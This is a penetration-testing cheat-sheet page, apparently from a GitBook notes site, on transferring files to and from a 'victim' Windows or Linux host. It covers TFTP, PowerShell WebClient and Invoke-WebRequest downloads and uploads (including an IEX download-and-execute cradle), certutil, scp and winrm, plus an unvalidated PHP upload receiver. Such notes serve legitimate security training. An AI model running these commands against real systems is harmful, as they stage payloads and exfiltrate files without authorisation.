Particle42
  • 🔬Network Enumeration
    • NMAP
    • TCPdump
  • 🔭Website Enumeration
    • Passive Information Gathering
    • Subdomain Enumeration
  • 🖥️Web Application
    • URL & App Scan
    • Subdomain/Vhost Fuzz
    • Login Hack
    • Cross Site Scripting
    • Directory Traversal
    • Local File Inclusion
    • Remote File Inclusion
    • PHP Wrappers
    • SQL Injection
      • Bypass Authentication
      • Database Enumeration
      • Code Execution Via Injection
      • SQL Injection Tools
      • Other Resources
    • NOSQL Injection
      • Bypass Authentication
    • WordPress Scanner
    • Hints & Easter Eggs
  • 🎣Phishing
    • Client Info Gathering
    • HTA
    • Word Macros
    • Windows Library Files
  • 🪟Windows
    • Enumeration & PE Quick Ref
    • Enumeration
      • Users
      • Powershell History
      • System Details
      • Applications & Services
      • Files & Filesystems
      • Cached Creds
    • Windows PE
      • Windows PE Checklist
      • Service Binary Hijacking
      • Important Files
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Other PE Methods
      • Finding PE Vulns
      • SeImpersonatePrivilege
      • Bypassuac using Bypassuac.exe
      • Bypassuac using eventviewer.exe
      • Rasta Watson
    • Windows Remote Access
  • 📂Active Directory
    • About
    • Important Definitions
    • Exploitation Methodology
    • AD Kerberos
      • Invoke-Kerberoast - Shortcut
    • Domain Recon
      • Auto Recon
    • AD Authentication Attacks
      • Password Guessing
      • Creating & Cracking TGS
      • Kerberoasting
    • Lateral Movement
      • Pass the Hash
      • Overpass the Hash
      • Pass the Ticket
      • Distributed Component Object Model
      • Golden Ticket
      • Shadow Copy
      • Domain Controller Sync
      • Windows Management Instrumentation
      • PowerShell Remoting
    • All Commands, Tools & Scripts
      • Using Crackmapexec
      • Using Powerview
      • Important Scripts & Links
  • 🍺Buffer Over Flow
    • Finding EIP Position
    • Eliminating Bad Characters
    • Finding Return Address
    • Payload for BOF
  • 🐧Linux
    • Enumeration
      • Users
      • Encrypted Files
      • System Info
      • Files & Filesystems
      • Applications & Services
    • Attack Vectors
      • Authorised Keys
    • Linux PE
      • Enumeration Commands
      • Finding PE Vulns
      • Check Sudo List
      • Add User to Passwd File
      • SUIDs
      • Tasks with Wildcard
      • Dirty Cow
      • DirtyPipe
      • Insecure File Permissions
      • Enumerating Processes
    • Quick Commands
  • Services
    • SMB
      • Find Server Version
      • Directory Traversal using Symlink
      • Enable Passwordless SMB Access
    • MSSQL
    • MYSQL
    • PHPLiteAdmin
    • SSH
      • Limited Keys Issue
    • SMTP
      • Sending Email
    • Webdav
    • DNS
      • DNS Recon
  • ↗️Pivoting
    • Bringing Internet Access
    • Port Forwarding
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
    • HTTP Tunnel-ing
    • DNS Tunneling
    • Chisel
    • Ligolo-NG
  • 🔑Passwords
    • Wordlist Generation
    • HTTP Applications
    • OS Login
    • Password Cracking
      • Using Hashes Directly
      • Cracking Hashes
    • SAM & System
  • 🛠️Practical Tools
    • Remote Shell
      • Alternate Reverse Shells
      • Move to Interactive Shell
    • File Transfers
      • Quick Webservers
    • CURL
    • Payloads
      • MSFVenom
      • Veil Framework
    • Crafty Executable
    • Metasploit
      • Discovery
    • IMPACKET
      • MSSQL-Client
    • Clever Alternatives
  • 🚀Privilege Escalation
    • General Info
  • ⚡Resources
    • Exploits
Powered by GitBook
On this page
  • TFTP
  • Powershell
  • SCP
  • Certutils
  • Winrm

Was this helpful?

  1. Practical Tools

File Transfers

TFTP

Trivial FTP is one of the simplest and easiest ways to transfer files between 2 systems. Windows 7 and above have multiple modes to transfer files such as ftp, powershell, etc, however the problem arises when the sytem is older than Windows 7.

Tftp is present by default in the older operation systems such as Windows XP and it is a great tool for transferring files using a non-interactive method.

Once you have atftpd service install on you linux system, you can use the following commands to transfer files,

sudo atftpd --daemon --port 69 /tftp

The above command gets the ftp server running on your local system. The following command can be used to transfer files into or out of the victim's system,

tftp -i 192.168.1.1 put evil.file

Powershell

Powershell on Windows can be used for transferring files between systems. There are 2 popular methods - Invoke-WebRequest and WebClient. Both the methods use HTTP methods to download or upload files to a server.

You have to have a webserver running in order to download or upload files from it. An apache server with php will be ideal to transfer files. As a makeshift you can also use python to start a webserver to download files. The following command can be used to start a webserver in python,

sudo python3 -m http.server 80

To download a file to a Windows machine using WebClient,

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/evil.php', 'new-exploit.php')

In continuation to the previous command, the same can be used to download a file and execute it without saving it in the victim's system using the following command,

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.1/hello.ps1')

To upload a file to a Windows machine using WebClient,

powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.1.1/upload.php', 'evil.php')

Make sure the complete path of the file is mentioned while using UploadFile

To download a file to a Windows maching using Invoke-WebRequest,

powershell.exe (Invoke-WebRequest http://192.168.1.1/evil.php -OutFile evil.php)

To upload a file to a Windows machine using Invoke-WebRequest,

powershell.exe (Invoke-WebRequest http://192.168.1.1/upload.php -Method Put -Infile C:\Users\Administrator\Desktop\evil.txt -UseBasicParsing)

In the last command the method "Put" is used instead of "Post" in order to avoid elaborate preparation of the HTTP request from the client's end. Instead "Put" is used and respective php scripting has to be deployed at the server end to receive the file.

The following is a sample of PHP code that can be used to receive the file when uploaded from a system,

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile) 
?>

SCP

SCP is a network protocol to transfer files securely between linux systems. By default it uses SSH Port - 22 for connecting to the remote server. You will need the username and password of the remote server to which the file needs to be transferred. The following command is a sample for file transfer,

scp file.txt remote_username@192.168.1.1:/Directory/Path

Certutils

Certutils is a Windows tool that can be used for downloading files to the local system.

certutil.exe -urlcache -f http://192.168.1.1/test.exe test.exe

Winrm

When connected to system using winrm, the tool can be used for both uploading and downloading files.

upload <Filename-fullpath> <Upload path full>
download <Filename-fullpath> <Download Path full>
PreviousMove to Interactive ShellNextQuick Webservers

Last updated 1 year ago

Was this helpful?

🛠️